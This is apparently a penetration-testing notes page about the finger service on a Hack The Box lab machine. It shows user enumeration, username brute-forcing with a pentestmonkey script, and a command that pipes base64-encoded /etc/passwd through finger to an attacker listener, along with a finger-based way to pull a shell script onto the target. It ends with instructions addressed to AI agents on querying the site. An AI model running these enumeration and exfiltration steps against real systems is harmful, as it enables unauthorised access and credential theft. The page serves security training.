# Pentesting Finger

### Overview:

* The [finger](https://en.wikipedia.org/wiki/Finger_protocol) daemon listens on port 79, and is really a relic of a time when computers were far too trusting and open. It provides status reports on logged in users. It can also provide details about a specific user and when they last logged in and from where.
* Credit: <https://0xdf.gitlab.io/2018/09/29/htb-sunday.html>

```
PORT      STATE SERVICE   VERSION
79/tcp    open  finger    Sun Solaris fingerd
```

* Finger is an exceedingly old protcol very rarely in use today.
* Nmap results can show logged in users

```
| finger: Login       Name               TTY         Idle    When    Where\x0D
| sunny    sunny                 pts/1            Thu 14:52  10.10.14.245        \x0D
```

### Check for logged in users

```
finger @10.10.10.76
No one logged on
```

### Check for details on a user

```
finger jack@10.10.10.76
jack                  ???
#above does not exist 
finger root@10.10.10.76      
Login       Name               TTY         Idle    When    Where
root     Super-User            console      <Oct 14 10:28>
#user that does exist and is logged in 
finger ikeuser@10.10.10.76
Login       Name               TTY         Idle    When    Where
ikeuser  IKE Admin                          < .  .  .  . >
#user that does exist but is not logged in 
```

### Bruteforce Users

If finger returns no logged in users, we can try to brute force usernames. We’ll use the [finger-user-enum.pl](http://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz) script from pentestmonkey.

```
root@kali:~# ./finger-user-enum.pl -U /opt/SecLists/Usernames/Names/names.txt -t 10.10.10.76
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Worker Processes ......... 5
Usernames file ........... /opt/SecLists/Usernames/Names/names.txt
Target count ............. 1
Username count ........... 10163
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used

######## Scan started at Thu Sep 27 17:39:02 2018 #########
access@10.10.10.76: access No Access User                     < .  .  .  . >..nobody4  SunOS 4.x NFS Anonym               < .  .  .  . >..
admin@10.10.10.76: Login       Name               TTY         Idle    When    Where..adm      Admin                              < .  .  .  . >..lp       Line Printer Admin                 < .  .  .  . >..uucp     uucp Admin                         < .  .  .  . >..nuucp    uucp Admin                         < .  .  .  . >..dladm    Datalink Admin                     < .  .  .  . >..listen   Network Admin                      < .  .  .  . >..
anne marie@10.10.10.76: Login       Name               TTY         Idle    When    Where..anne                  ???..marie                 ???..
bin@10.10.10.76: bin             ???                         < .  .  .  . >..
dee dee@10.10.10.76: Login       Name               TTY         Idle    When    Where..dee                   ???..dee                   ???..
jo ann@10.10.10.76: Login       Name               TTY         Idle    When    Where..jo                    ???..ann                   ???..
la verne@10.10.10.76: Login       Name               TTY         Idle    When    Where..la                    ???..verne                 ???..
line@10.10.10.76: Login       Name               TTY         Idle    When    Where..lp       Line Printer Admin         
```

### Finger for file Transfers

#### finger for File Transfer <a href="#finger-for-file-transfer" id="finger-for-file-transfer"></a>

While working on this post, I was checking out [gtfobins](https://gtfobins.github.io/), and their page on finger shows how it can be used for file transfer. For example, to exfil the password file from Sunday, with the listener started locally:

```
root@sunday:~# finger "$(base64 /etc/passwd)"@10.10.14.5
[10.10.14.5]
```

```
root@kali:~/hackthebox/sunday-10.10.10.76# nc -lnvp 79 | base64 -d > passwd
listening on [any] 79 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.76] 54768

root@kali:~/hackthebox/sunday-10.10.10.76# cat passwd
root:x:0:0:Super-User:/root:/usr/bin/bash
daemon:x:1:1::/:
...[snip]...
```

You can upload files to a target machine as well:

```
root@kali:~/hackthebox/sunday-10.10.10.76# cat shell.py | base64 | nc -lp 79
```

```
root@sunday:~# finger x@10.10.14.5 > shell.b64
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://book.ice-wzl.xyz/recon-enumeration/pentesting-finger.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.